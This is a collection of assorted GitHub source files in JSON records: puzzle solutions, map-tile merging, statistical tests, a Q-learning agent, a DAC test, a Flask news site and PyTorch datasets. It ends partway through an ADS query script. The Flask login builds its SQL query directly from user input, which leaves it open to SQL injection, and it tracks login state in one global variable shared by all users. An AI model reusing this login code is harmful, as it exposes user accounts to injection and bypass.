color='r')\r\nax2.tick_params('y', colors='r')\r\n\r\nPF.setattrs(ax1.lines[0],'b')\r\nPF.setattrs(ax2.lines[0],'r')\r\n\r\nax3.set_title('Accuracy and Loss for Test Set')\r\nax3.set_xlabel('Epoch')\r\nax3.set_ylabel('Accuracy', color='b')\r\nax3.tick_params('y', colors='b')\r\nax4.set_ylabel('Loss', color='r')\r\nax4.tick_params('y', colors='r')\r\n\r\nPF.setattrs(ax3.lines[0],'b')\r\nPF.setattrs(ax4.lines[0],'r')\r\n'''\r\n\r\n#Plot accuracy\r\nfig, ax = plt.subplots()\r\nplt.plot(t,acc_tr[0],'b-')\r\nplt.plot(t,acc_tr[1],'r-.')\r\nplt.title('Accuracy for Train and Test Sets')\r\nax.set_xlabel('Epoch')\r\nax.set_ylabel('Accuracy (%)')\r\n\r\nlabels = ['train', 'test']\r\nplt.legend(labels, fancybox=True, shadow=True, labelspacing=0.0)\r\n\r\nfig.tight_layout()\r\nplt.show()\r\n","repo_name":"TSPereira/Kaggle-Projects","sub_path":"Sign Language/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":6353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"16536788744","text":"n = int(input())\n\nfor _ in range(n):\n x, y = map(int, input().split())\n dist = y - x\n \n count = 1\n number = 2\n \n while number < dist:\n count += 1\n number += count * 2\n \n diff = number - dist\n \n if diff >= count:\n print(count * 2 -1)\n else:\n print(count * 2)","repo_name":"hodurie/Algorithm","sub_path":"Baekjoon/Silver/1011.py","file_name":"1011.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} 
+{"seq_id":"80030571","text":"#! /usr/bin/env python3\n'''\n(C) 2020 Andreas Vogel\nwww.wellenvogel.de\nMIT license\n\nPrepare with\npip install pillow\n'''\n\nimport sqlite3\nimport sys\nimport os\nfrom PIL import Image\nimport io\nimport getopt\n\ndef usage():\n print(\"usage: %s [-a] [-q] outfile infile [infile...]\\n\"%sys.argv[0])\n\nCREATES=[\n \"CREATE TABLE tiles (zoom_level integer,tile_column integer,tile_row integer, tile_data blob)\",\n \"CREATE TABLE metadata (name text, value text)\",\n \"CREATE UNIQUE INDEX name on metadata (name)\",\n \"CREATE UNIQUE INDEX tile_index on tiles(zoom_level, tile_column, tile_row)\"\n]\n\nclass Box:\n def __init__(self,minCol=None,maxCol=None,minRow=None,maxRow=None):\n self.minCol=minCol\n self.maxCol=maxCol\n self.minRow=minRow\n self.maxRow=maxRow\n\n def valid(self):\n if self.minCol is None:\n return False\n if self.maxCol is None:\n return False\n if self.minRow is None:\n return False\n if self.maxRow is None:\n return False\n return True\n\n def rowRange(self):\n return range(self.minRow,self.maxRow+1)\n\n def colRange(self):\n return range(self.minCol,self.maxCol+1)\n\n def merge(self,other):\n if not other.valid():\n return\n if other.minCol < self.minCol:\n self.minCol=other.minCol\n if other.minRow < self.minRow:\n self.minRow = other.minRow\n if other.maxCol > self.maxCol:\n self.maxCol=other.maxCol\n if other.maxRow > self.maxRow:\n self.maxRow=other.maxRow\n\n def __str__(self) -> str:\n return \"minCol=%s,maxCol=%d,minRow=%d,maxRow=%d\"%(self.minCol,self.maxCol,self.minRow,self.maxRow)\n\n\ndef row2y(row,zoom,format=\"xyz\"):\n if format == \"xyz\":\n return pow(2,zoom)-1-row\n else:\n return row\n\ndef mergeTile(tileDataStack,format):\n if len(tileDataStack) == 1:\n return tileDataStack[0]\n im=Image.open(io.BytesIO(tileDataStack[0])).convert(\"RGBA\")\n for d in tileDataStack[1:]:\n if len(d) == 0:\n continue\n try:\n mi=Image.open(io.BytesIO(d)).convert(\"RGBA\")\n im=Image.alpha_composite(im,mi)\n except Exception as e:\n print(\"error in overlay tile, ignore\")\n continue\n out =io.BytesIO()\n im.convert(\"RGB\").save(out,format)\n return out.getvalue()\n\ndef insertTiles(conn,stack):\n conn.executemany(\"insert into tiles (zoom_level,tile_column,tile_row,tile_data) values(?,?,?,?)\",stack)\n\ndef getTileFormat(conn):\n row=conn.execute(\"select tile_data from tiles limit 10\")\n format =None\n while format is None:\n t=row.fetchone()\n if t is None:\n row.close()\n return None\n if len(t[0]) > 0:\n img=Image.open(io.BytesIO(t[0]))\n if img.format is not None:\n return img.format\n\ndef fetchTile(connection,col,row,zoom):\n cu = connection.execute(\"select tile_data from tiles where zoom_level=? and tile_column=? 
and tile_row=?\", [zoom, col, row])\n t = cu.fetchone()\n cu.close()\n if t is None:\n return None\n return t[0]\n\ndef mergeMbTiles(outfile,infiles,mergeAll=False,silent=False):\n if len(infiles) < 1:\n usage()\n return False\n if os.path.exists(outfile):\n print(\"outfile %s already exists\"%outfile)\n return False\n for f in infiles:\n if not os.path.exists(f):\n print(\"infile %s not found\"%f)\n return False\n if not silent:\n print(\"writing to %s\"%outfile)\n #compute boxes\n minZoom=None\n maxZoom=None\n boxes={}\n boxfiles=infiles[0:0] if not mergeAll else infiles\n isBase=True\n format=None\n connections=[]\n for h in boxfiles:\n if not silent:\n print(\" layer %s\"%h)\n connection=sqlite3.connect(h)\n connections.append(connection)\n if connection is None:\n print(\"unable to open sqlite connection to %s\"%h)\n return False\n zoomlevels=[]\n cu=connection.execute(\"select distinct zoom_level from tiles\")\n for z in cu.fetchall():\n zoomlevels.append(z[0])\n cu.close()\n if len(zoomlevels) < 1:\n print(\"no zoomlevels found in %s\"%h)\n return False\n if not silent:\n print(\"zoom levels in %s: %s\" % (h, \",\".join(map(lambda x: str(x),zoomlevels))))\n for zoom in zoomlevels:\n box=Box()\n cu=connection.execute(\"select min(tile_column),max(tile_column) from tiles where zoom_level=?\",[zoom])\n data = cu.fetchone()\n if data is not None:\n box.minCol=data[0]\n box.maxCol=data[1]\n cu.close()\n cu = connection.execute(\"select min(tile_row),max(tile_row) from tiles where zoom_level=?\", [zoom])\n data = cu.fetchone()\n if data is not None:\n box.minRow=data[0]\n box.maxRow=data[1]\n cu.close()\n if not silent:\n print(\"zoom=%d, %s\"%(zoom,str(box)))\n existing=boxes.get(zoom)\n if existing is not None:\n existing.merge(box)\n if not silent:\n print(\"updated: zoom=%d, %s\"%(zoom,str(existing)))\n else:\n boxes[zoom]=box\n if isBase:\n format=getTileFormat(connection)\n if format is None:\n print(\"unable to determine tile format for base layer %s\"%h)\n return False\n if not silent:\n print(\"base layer tile format is %s\"%format)\n isBase=False\n\n outconnection=sqlite3.connect(outfile)\n if outconnection is None:\n print(\"cannot create %s\"%outfile)\n return False\n outcu=outconnection.cursor()\n for stmt in CREATES:\n if not silent:\n print(\"executing %s\"%stmt)\n outcu.execute(stmt)\n if not mergeAll:\n for ov in infiles[1:]:\n print(\"adding %s\"%ov)\n c=sqlite3.connect(ov)\n connections.append(c)\n for zoom in sorted(boxes.keys()):\n box=boxes[zoom]\n if not box.valid():\n print(\"no tiles at zoom %d\"%zoom)\n continue\n insertStack=[]\n for row in box.rowRange():\n for col in box.colRange():\n tileDataStack=[]\n for c in connections:\n t=fetchTile(c,col,row,zoom)\n if t is not None:\n tileDataStack.append(t)\n if len(tileDataStack) < 1:\n if not silent:\n print('no tile for z=%d,row=%d,col=%d'%(zoom,row,col))\n continue\n try:\n outdata=mergeTile(tileDataStack,format)\n except Exception as e:\n print(\"error when creating tile z=%d,row=%d,col=%d: %s\"%(zoom,row,col,e))\n continue\n insertStack.append([zoom,col,row,outdata])\n if len(insertStack) >=10:\n insertTiles(outconnection,insertStack)\n insertStack=[]\n outconnection.commit()\n outconnection.close()\n\n\n\n\n\n\nif __name__ == \"__main__\":\n try:\n opts,args=getopt.getopt(sys.argv[1:],'aq')\n except getopt.GetoptError as e:\n print(e)\n usage()\n sys.exit(1)\n if len(args) < 3:\n usage()\n sys.exit(1)\n mergeAll=False\n silent=False\n for o,a in opts:\n if o == '-s':\n silent=True\n elif o == '-a':\n 
mergeAll=True\n mergeMbTiles(args[0],args[1:],mergeAll=mergeAll,silent=silent)\n","repo_name":"wellenvogel/mbtilesmerge","sub_path":"merger.py","file_name":"merger.py","file_ext":"py","file_size_in_byte":6754,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"70588802287","text":"import sys\r\nsys.path.append(\"..\")\r\nsys.path.append(\".\")\r\nfrom utils import *\r\nimport numpy as np\r\nfrom morphological import binary_edge\r\nif __name__ == '__main__':\r\n img = get_examples_image()\r\n img[img > 127] = 255\r\n img[img <= 127] = 0\r\n s = visualization(1,3)\r\n s.append_img(img)\r\n kernel = np.ones((5,5))\r\n s.append_img(binary_edge(img,kernel))\r\n kernel = np.ones((11,11))\r\n s.append_img(binary_edge(img,kernel))\r\n s.show()","repo_name":"chinoll/digital_image_processing","sub_path":"morphological/binary_edge.py","file_name":"binary_edge.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"2"} +{"seq_id":"41588815230","text":"from advent.input_reader import read_list_of_values\n\ncypher = read_list_of_values('input/2020/day_8', int)\n\npre = 25\ninv = -1\n\nprint('Part 1')\nfor i in range(pre, len(cypher)):\n val = cypher[i]\n ok = False\n for n in cypher[i-pre:i]:\n for m in cypher[i-pre:i]:\n if n != m and n+m == val:\n ok = True\n break\n if ok:\n break\n if not ok:\n inv = val\n print(val)\n break\n\nprint('Part 2')\n\nok = False\nfor i, n in enumerate(cypher):\n # print(f'start at [{i}]: {n}')\n val = n\n for j, m in enumerate(cypher[i+1:]):\n val += m\n # print(f'sums to {val}')\n if val == inv:\n print(cypher[i:j + i + 2], sum(cypher[i:j + i + 2]))\n a = min(cypher[i:j + i + 2])\n b = max(cypher[i:j + i + 2])\n print(f'{a}+{b}={a+b}')\n ok = True\n break\n if val > inv:\n break\n if ok:\n break\n\nprint(sum(cypher[562:579]))","repo_name":"LouisAumaitre/AdventOfCode","sub_path":"advent/_2020/day_9.py","file_name":"day_9.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"4601121555","text":"import pandas as _pd\nimport statsmodels.api as sm\nfrom statsmodels.compat import lzip\nfrom statsmodels.stats.stattools import jarque_bera as _jarque_bera\nfrom statsmodels.tsa.stattools import adfuller as _adfuller\nfrom statsmodels.tsa.stattools import kpss as _kpss\n\n\ndef test_jarque_bera(s, alpha=0.01, **kwargs):\n print('H0: sample datasets have the skewness and kurtosis matching a normal distribution', end='\\n\\n')\n print('Results of Jarque Bera Test:')\n jqberatest = _jarque_bera(s, **kwargs)\n jq_output = _pd.Series(jqberatest, index=['Test Statistic', 'p-value', 'skew', 'kurtosis'])\n print(jq_output, end='\\n\\n')\n pvalue = jqberatest[1]\n if pvalue < alpha:\n print(f'p-value {pvalue:.4f} is less alpha {alpha} => Reject H0')\n else:\n print('Can NOT reject H0')\n\n\ndef test_kpss(timeseries, alpha=0.01, **kwargs):\n trend_name = kwargs.get('regression', 'constant')\n if trend_name == 'ct':\n trend_name = 'trend'\n print('H0: observable time series is stationary around a {}'.format(trend_name), end='\\n\\n')\n print('Results of KPSS Test:')\n kpsstest = _kpss(timeseries, **kwargs)\n kpss_output = _pd.Series(kpsstest[0:3], index=['Test Statistic', 'p-value', 'Lags Used'])\n for key, value in kpsstest[3].items():\n kpss_output['Critical Value (%s)' % key] = value\n print(kpss_output, end='\\n\\n')\n pvalue = kpsstest[1]\n if pvalue 
< alpha:\n print(f'p-value {pvalue:.4f} is less alpha {alpha} => Reject H0')\n else:\n print('Can NOT reject H0')\n\n\ndef test_adf(timeseries, alpha=0.01, **kwargs):\n print('H0: unit root present in the time series', end='\\n\\n')\n print('Results of Dickey-Fuller Test:')\n dftest = _adfuller(timeseries, **kwargs)\n dfoutput = _pd.Series(dftest[0:4], index=['Test Statistic', 'p-value', '#Lags Used', 'Number of Observations Used'])\n for key, value in dftest[4].items():\n dfoutput['Critical Value (%s)' % key] = value\n print(dfoutput, end='\\n\\n')\n pvalue = dftest[1]\n if pvalue < alpha:\n print(f'p-value {pvalue:.4f} is less alpha {alpha} => Reject H0')\n else:\n print('Can NOT reject H0')\n\n\ndef test_condition_number():\n pass\n\n\ndef test_variance_inflation_factor():\n pass\n\n\ndef test_breusch_pagan(s, exog, alpha=0.01, **kwargs):\n print('H0: series is homoskedastic', end='\\n\\n')\n print('Results of BP Test:')\n names = ['Lagrange multiplier statistic', 'p-value',\n 'f-value', 'f p-value']\n bptest = sm.stats.het_breuschpagan(s, exog)\n bp_output = _pd.Series(bptest, index=names)\n print(bp_output, end='\\n\\n')\n pvalue = bptest[1]\n if pvalue < alpha:\n print(f'p-value {pvalue:.4f} is less alpha {alpha} => Reject H0')\n else:\n print('Can NOT reject H0')\n\n","repo_name":"a4shubert/statslib","sub_path":"statslib/_lib/stat_tests.py","file_name":"stat_tests.py","file_ext":"py","file_size_in_byte":2776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"6980130649","text":"# Agent that uses a Q-Lookup Table (Specific form of Q-Learning) to approximate it's value function\nimport numpy as np\n\nfrom reinforcement_learning.r_agent import RAgent\n\n\nclass QAgent(RAgent):\n def __init__(self, env, eps=1.00, discount_rate=0.99, learning_rate=0.01):\n super().__init__(env)\n self.eps = eps\n self.discount_rate = discount_rate\n self.learning_rate = learning_rate\n self.plot = None\n self.total_rewards = None\n # self.build_table()\n\n # This assumes a discrete action and observation state\n # def build_table(self):\n # self.q_table = 1e-4 * np.random.random([self.observation_size, self.action_size])\n\n def get_action(self, state):\n if np.random.uniform() < self.eps:\n return super().get_action(state)\n else:\n # Greedy Choice\n action_values = self.q_table[state]\n action = np.argmax(action_values)\n return action\n\n def train(self, experience):\n state, next_state, reward, action, done = experience\n q_next = self.q_table[next_state]\n q_next = np.zeros([self.action_size]) if done or state == next_state else q_next\n q_target = reward + self.discount_rate * np.max(q_next)\n\n # Loss Fn\n q_update = q_target - self.q_table[state, action]\n\n # Update the table with a learning rate\n self.q_table[state, action] += self.learning_rate * q_update\n\n if done:\n self.eps *= 0.99\n\n def set_for_train(self, power=0, operand=10, epsilon=None):\n if epsilon != None:\n self.eps = epsilon\n change = operand ** (-1 * power)\n self.learning_rate *= change","repo_name":"brandonywl/MDP_Algo","sub_path":"reinforcement_learning/q_agent.py","file_name":"q_agent.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"6216049781","text":"import rpimcp4822 as mcp\nimport time\n\ndev1 = mcp.RPiMCP4822(max_speed_khz=1000)\ndev1.setup_output_latch()\nprint(\"writing A to .4mV but not latching...\")\ndev1.write(400, 0)\ntime.sleep(2)\nprint(\"now 
writing .9V to B but still not latching\")\ndev1.write(900,1)\ntime.sleep(2)\nprint(\"writing 1.1V, waiting 2s to latch...\")\ndev1.write(1100,0)\ntime.sleep(1)\nprint(\"...1s...\")\ntime.sleep(1)\nprint(\"latching 1.1V, immediately writing .5V but not latching, waiting 4s...\")\ndev1.update_output()\ndev1.write(500, 0) # write channel A lower, but won't show up yet\ntime.sleep(2)\nprint(\"...2s...\")\ntime.sleep(2)\nprint(\"updating output to .5V, immediately writing 1200mV, then waiting 2s but never latching...\")\ndev1.update_output()\ndev1.write(1200, 0) # write 400mV to channel A\ntime.sleep(1)\nprint(\"...1s...\")\ntime.sleep(1)\n\ndev1.shutdown()\nprint(\"complete\")","repo_name":"mikewillems/rpimcp4822","sub_path":"rpimcp4822test.py","file_name":"rpimcp4822test.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"39432828824","text":"from flask import render_template, redirect, url_for, flash\nfrom application import app\nfrom application import mysql\nimport MySQLdb\nimport MySQLdb.cursors\nfrom application.forms import RegisterForm, LoginForm\nimport socket\nimport json\nimport random\n\n# Import modules for API Access\nimport http.client, urllib.parse\n\n# Load API Key\nimport os\nfrom dotenv import load_dotenv\nload_dotenv()\nAPI_KEY = os.getenv('API_KEY')\n\n# Create dictionary to store session information\n\n# DEFINE SQL STATEMENTS\nCREATE_USER = \"\"\"\nINSERT INTO user\n(username, email_address, password)\nVALUES (%s, %s, SHA1(%s))\n\"\"\"\n\n@app.route('/')\n@app.route('/home')\ndef home_page():\n return render_template('home.html')\n\n\n@app.route(\"/news\")\ndef news_page():\n try:\n # Validate user session\n if not loggedin:\n return render_template('home.html')\n except NameError:\n return render_template('home.html')\n\n # Connect to Mediastack API\n conn = http.client.HTTPConnection('api.mediastack.com')\n params = urllib.parse.urlencode({\n 'access_key': API_KEY,\n 'categories': 'general,science,sports,health,technology,entertainment',\n 'countries': 'ng,us,gb',\n 'languages': 'en',\n 'limit': 100\n })\n try:\n conn.request('GET', '/v1/news?{}'.format(params))\n except socket.gaierror:\n return '
Connection Timeout
'\n res = conn.getresponse()\n json_object = res.read()\n\n # Convert json response from api to python object\n python_object = json.loads(json_object)\n data = python_object['data']\n\n # Use random image from list \n images = [\n \"https://motionarray.imgix.net/preview-328095-gNWCObG9we-high_0004.jpg?w=660&q=60&fit=max&auto=format\",\n \"https://i.ytimg.com/vi/hBOUjUEY46w/hqdefault.jpg \",\n \"https://d1csarkz8obe9u.cloudfront.net/posterpreviews/breaking-news-poster-design-template-232c3f2700b91a0fd6e3a5a2e583a5da_screen.jpg?ts=1610645412\",\n \"https://media.istockphoto.com/vectors/breaking-news-live-banner-on-dotted-map-of-the-world-background-vector-id1150517899?k=20&m=1150517899&s=612x612&w=0&h=jMz9KZVY_abyiXfjdYfDMw0pUD2iTdNRnFBcHJgsxoI=\",\n \"https://cdn2.vectorstock.com/i/1000x1000/31/26/breaking-news-logo-icon-for-news-entertaining-vector-28933126.jpg\",\n \"https://i.pinimg.com/originals/24/39/a6/2439a657128437d7b308e112f05c2b70.png\",\n \"https://archive.org/download/news-logo/news-logo.png\",\n \"https://e7.pngegg.com/pngimages/155/416/png-clipart-record-news-logo-identidade-visual-connected-idea-logo-miscellaneous-television.png\",\n \"https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRPIs696h2cnMnWZudUbFg5xrhGxzKMJtJFXA&usqp=CAU\",\n \"https://www.presentation-3d.com/image/maker3d/demos/3dlogo120601.png\",\n \"https://cdn1.vectorstock.com/i/1000x1000/01/45/world-news-logo-flat-style-vector-20910145.jpg\",\n \"https://www.vinsighte.com.ng/img/partners-img/world-news.jpg\",\n \"https://image.shutterstock.com/image-photo/image-260nw-1080857420.jpg\"\n ]\n\n items = []\n\n for news in data:\n item = {\n 'title': news['title'],\n 'description': news['description'],\n 'url': news['url'],\n 'image': news['image'],\n 'backup_image': random.choice(images)\n }\n items.append(item)\n\n return render_template('news_page.html', items=items)\n\n\n@app.route(\"/\")\n@app.route(\"/customize\")\ndef customization_page():\n # Validate user session\n try:\n if not loggedin:\n return render_template('home.html')\n except NameError:\n return render_template('home.html')\n\n # Parameters to be accepted from user and fed to the API\n countries = ['Australia', 'Canada', 'China', 'France', 'Germany', 'India', 'Italy', 'Nigeria', 'Poland', 'Singapore', 'United States', 'United Kingdom']\n languages = ['Chinese', 'Dutch', 'English', 'French', 'German', 'Hebrew', 'Italian', 'Norweighian', 'Portuguese', 'Russian', 'Spanish', 'Swedish']\n categories = ['General', 'Business', 'Celebrity Gossip', 'Entertainment', 'Finance', 'Health', 'IT', 'Medicine & Pharmacy', 'Politics', 'Technology', 'Science', 'Sports']\n items = [\n {'country': countries[0], 'language': languages[0], 'category': categories[0]},\n {'country': countries[1], 'language': languages[1], 'category': categories[1]},\n {'country': countries[2], 'language': languages[2], 'category': categories[2]},\n {'country': countries[3], 'language': languages[3], 'category': categories[3]},\n {'country': countries[4], 'language': languages[4], 'category': categories[4]},\n {'country': countries[5], 'language': languages[5], 'category': categories[5]},\n {'country': countries[6], 'language': languages[6], 'category': categories[6]},\n {'country': countries[7], 'language': languages[7], 'category': categories[7]},\n {'country': countries[8], 'language': languages[8], 'category': categories[8]},\n {'country': countries[9], 'language': languages[9], 'category': categories[9]},\n {'country': countries[10], 'language': languages[10], 'category': 
categories[10]},\n {'country': countries[11], 'language': languages[11], 'category': categories[11]},\n ]\n\n return render_template('customize_page.html', items=items)\n\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register_page():\n form = RegisterForm()\n\n if form.validate_on_submit():\n username = form.username.data\n email_address = form.email_address.data\n password1 = form.password1.data\n cursor = mysql.connection.cursor()\n\n # MYSQL Operational Errors\n try:\n cursor.execute(CREATE_USER, (username, email_address, password1))\n except MySQLdb.OperationalError:\n return '''\n
Connection Time out\n            Return To Previous Page
\n '''\n\n # Save to database\n mysql.connection.commit()\n\n # Close cursor\n cursor.close()\n\n # Create session information\n global loggedin\n loggedin = True\n\n return news_page()\n\n # Flash Error messages\n if form.errors != {}:\n for err_msg in form.errors.values():\n flash(f'{err_msg[0]}')\n\n return render_template('register.html', form=form)\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login_page():\n form = LoginForm()\n if form.validate_on_submit():\n username = form.username.data\n password = form.password.data\n\n # Execute SQL Query to validate details\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(f\"SELECT * FROM user WHERE username = '{username}' AND password = SHA1('{password}')\")\n account = cursor.fetchone()\n\n if account:\n flash(f'Success! You are logged in as {username}', category='success')\n \n # Store session information\n global loggedin\n loggedin = True\n \n return news_page()\n else:\n flash('Username or Password incorrect. Please try again.', category='danger')\n return render_template('login.html', form=form)\n\n\n@app.route('/logout')\ndef logout():\n global loggedin\n loggedin = False\n return render_template('home.html')\n","repo_name":"Kelvinskell/terra-tier","sub_path":"application/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":7599,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"2"} +{"seq_id":"1280206350","text":"from gym_curve.envs.curve_env import CurveEnv\nimport numpy as np\nenv = CurveEnv()\n\nobs = env.reset()\nfor i in range(1500):\n\n env.render()\n # action = np.random.choice(env._possible_moves())\n action = \"left\"\n\n obs, rewards, done, info = env.step(action)\n\n #print(i, obs, action, info)\n #print(info)\n if done:\n print(\"DONE\")\n obs = env.reset()\n\n","repo_name":"awieczork/Curve-Fever","sub_path":"CurveFeverGame.py","file_name":"CurveFeverGame.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"40670667296","text":"from itertools import combinations\n\ndef solution(relations):\n columns = [[] for _ in range(len(relations[0]))]\n for relation in relations:\n for i in range(len(relation)):\n columns[i].append(relation[i])\n \n minimality = set(i for i in range(len(columns)) if len(columns[i]) == len(set(columns[i])))\n second_mini = set()\n if len(columns) == 1:\n return len(minimality)\n # print(minimality) \n \n for i in range(2, len(columns) + 1):\n for combination in combinations([j for j in range(len(columns))], i):\n # 만일 존재한다면 유일성이 깨지므로 패스\n \n if minimality.intersection(combination):\n continue\n # print(combination)\n select_set = set(tuple(columns[j][i] for j in combination) for i in range(len(columns[0])))\n # print(select_set)\n if len(select_set) == len(columns[0]):\n second_mini.add(combination)\n \n # print(minimality, second_mini)\n mini_list = list(second_mini)\n sub_mini = set()\n for i in range(0, len(mini_list) - 1):\n for j in range(i + 1, len(mini_list)):\n # print(mini_list[i], mini_list[j])\n a = set(mini_list[i])\n b = set(mini_list[j])\n # print(a, b)\n if a.issubset(b):\n sub_mini.add(mini_list[j])\n xx = second_mini.difference(sub_mini)\n return len(minimality) + len(xx)\n\n\nrelations = 
[[\"100\",\"ryan\",\"music\",\"2\"],[\"200\",\"apeach\",\"math\",\"2\"],[\"300\",\"tube\",\"computer\",\"3\"],[\"400\",\"con\",\"computer\",\"4\"],[\"500\",\"muzi\",\"music\",\"3\"],[\"600\",\"apeach\",\"music\",\"2\"]]\nprint(solution(relations))","repo_name":"REXIANN/AlgorithmSolving","sub_path":"programmers/후보키.py","file_name":"후보키.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"34437770338","text":"\nimport numpy as np\nfrom torch.utils.data import Dataset, DataLoader\n\n\n\nclass TensorDataset(Dataset):\n\n def __init__(self, sparseTensor):\n self.sparseTensor = sparseTensor\n self.tIdx, self.rIdx, self.cIdx = self.sparseTensor.nonzero()\n\n def __len__(self):\n return len(self.tIdx)\n\n def __getitem__(self, id):\n tIdx = self.tIdx[id]\n rIdx = self.rIdx[id]\n cIdx = self.cIdx[id]\n mVal = self.sparseTensor[tIdx, rIdx, cIdx]\n return tIdx, rIdx, cIdx, mVal\n\n\nclass SequentialDataset:\n\n def __init__(self, dense, windows, density):\n\n self.dense = dense\n quantile = np.percentile(self.dense, q=99)\n self.dense[self.dense > quantile] = quantile\n self.dense /= quantile\n self.start = -windows\n self.windows = windows\n self.density = density\n self.mask = np.random.rand(*dense.shape).astype('float32')\n self.mask[self.mask > self.density] = 1\n self.mask[self.mask < self.density] = 0\n\n def move_next(self):\n self.start += self.windows\n return self.start < self.dense.shape[0]\n\n def reset(self):\n self.start = -self.windows\n\n def get_loaders(self):\n curr_tensor = self.dense[self.start:self.start + self.windows]\n curr_mask = self.mask[self.start:self.start + self.windows]\n trainTensor = curr_tensor * (1 - curr_mask)\n testTensor = curr_tensor * curr_mask\n trainset = TensorDataset(trainTensor)\n testset = TensorDataset(testTensor)\n trainLoader = DataLoader(trainset, batch_size=128, shuffle=True)\n testLoader = DataLoader(testset, batch_size=1024)\n return trainLoader, testLoader\n\n\nclass SequentialFutureDataset:\n\n def __init__(self, dense, windows, density):\n\n self.dense = dense\n quantile = np.percentile(self.dense, q=99)\n self.dense[self.dense > quantile] = quantile\n self.dense /= quantile\n self.start = -windows\n self.windows = windows\n self.density = density\n self.mask = np.random.rand(*dense.shape).astype('float32')\n self.mask[self.mask > self.density] = 1\n self.mask[self.mask < self.density] = 0\n\n def move_next(self):\n self.start += self.windows\n return self.start < self.dense.shape[0]\n\n def reset(self):\n self.start = -self.windows\n\n def get_loaders(self):\n curr_tensor = self.dense[self.start:self.start + self.windows]\n curr_mask = self.mask[self.start:self.start + self.windows]\n currTrain = curr_tensor * (1 - curr_mask)\n currTest = curr_tensor * curr_mask\n trainset = TensorDataset(currTrain)\n testset = TensorDataset(currTest)\n curr_trainLoader = DataLoader(trainset, batch_size=128, shuffle=True, drop_last=True)\n curr_testLoader = DataLoader(testset, batch_size=1024)\n\n if self.start + 2 * self.windows < self.dense.shape[0]:\n future_tensor = self.dense[self.start + self.windows: self.start + 2 * self.windows]\n future_mask = self.mask[self.start + self.windows: self.start + 2 * self.windows]\n futureTrain = future_tensor * (1 - future_mask)\n futureset = TensorDataset(futureTrain)\n future_trainLoader = DataLoader(futureset, batch_size=128, shuffle=True, drop_last=True)\n return curr_trainLoader, curr_testLoader, 
future_trainLoader\n\n return curr_trainLoader, curr_testLoader, None\n\n\n\n\n","repo_name":"MerrillLi/LightNestle","sub_path":"module/SeqDataset.py","file_name":"SeqDataset.py","file_ext":"py","file_size_in_byte":3470,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"2"} +{"seq_id":"30751840876","text":"# Paperboy written by Andy Casey, acasey@mso.anu.edu.au\n# http://astrowizici.st\n\n# Change these for a given institute\nHOST = \"mso.anu.edu.au\"\nFROM_ADDRESS = \"Paperboy\"\nADMIN_ADDRESS = \"acasey@mso.anu.edu.au\"\nINSTITUTE_QUERY = [\n \"*mount stromlo observatory*\", # or\n \"*research school of astronomy and astrophysics*\"\n]\n# Don't change anything past here unless you're a Python wizard.\n\nimport logging\nimport os\nimport re\nimport urllib2\nimport smtplib\nimport sys\nimport textwrap\nimport time\nimport traceback\n\nfrom calendar import monthrange\nfrom datetime import datetime\nfrom email import Encoders\nfrom email.MIMEBase import MIMEBase\nfrom email.MIMEMultipart import MIMEMultipart\nfrom email.MIMEText import MIMEText\nfrom email.Utils import formatdate\n\nfrom pyPdf import PdfFileReader, PdfFileWriter\n\nlogging.basicConfig(filename=os.path.join(os.path.dirname(__file__), datetime.now().strftime('%Y-%m-%d_%H:%M:%S.log')), filemode='w', level=logging.DEBUG)\n\n\ndef retrieve_article_urls(start_year, start_month, end_year, end_month, timeout=120):\n \"\"\"Retrieves the bibliography codes and URLS for all peer-reviewed articles\n published in the specified time frame from an institute.\n \n Inputs\n ----\n start_year : int\n Year to start searching from, e.g., 2012.\n \n start_month : int\n Month to start searching from between 1-12.\n \n end_year : int\n Year to stop searching from (inclusive).\n \n end_month : int\n Month to stop searching from between 1-12 (inclusive).\n \n timeout : int, optional\n Number of seconds to wait before timing out the socket connection\n \n Raises\n ----\n ValueError\n If the end date is before the start date, or the start date is in the\n future.\n \n Returns\n ----\n articles : list containing tuples of length 2\n Each tuple contains a bibliography code and the article URL.\n \"\"\"\n \n st = datetime(start_year, start_month, 1)\n et = datetime(end_year, end_month, monthrange(end_year, end_month)[1])\n \n if st > et:\n raise ValueError(\"End date specified is before the start date.\")\n \n if st > datetime.now():\n raise ValueError(\"We're astronomers not astrologers; we can't predict the future.\")\n \n \n logging.info(\"Looking for peer-reviewed articles on ADS published between %i/%i and %i/%i\" \\\n % (start_year, start_month, end_year, end_month, ))\n \n # Prepare the data for ADS \n affiliation = \"%0D%0A\".join(INSTITUTE_QUERY).replace(' ', '+') \n data = \"\"\"db_key=AST&db_key=PRE&qform=AST&arxiv_sel=astro-ph&arxiv_sel=cond-\n mat&arxiv_sel=cs&arxiv_sel=gr-qc&arxiv_sel=hep-ex&arxiv_sel=hep-lat&arxiv_se\n 